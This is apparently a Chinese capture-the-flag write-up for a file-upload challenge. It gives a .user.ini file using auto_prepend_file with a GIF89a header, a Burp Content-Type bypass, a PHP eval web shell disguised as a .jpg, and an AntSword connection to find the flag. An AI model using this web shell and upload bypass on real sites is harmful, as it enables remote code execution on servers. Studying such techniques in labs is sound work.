1.新建.user.ini文件,内容如下
GIF89a
auto_prepend_file=a.jpg
2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为
Content-Type: image/jpg
3.放包,结果如下
4. 新建a.txt文件,内容为
GIF89a
<?=eval($_REQUEST['cmd']);?>
保存后将文件后缀修改为.jpg
5.直接上传该文件即可成功上传
PS:按F12打开调试器选择网络查看上传文件的地址
如图所示上传地址为:****/uploads/index.php
6.直接蚁剑连接
7.结果如下
8.查找flag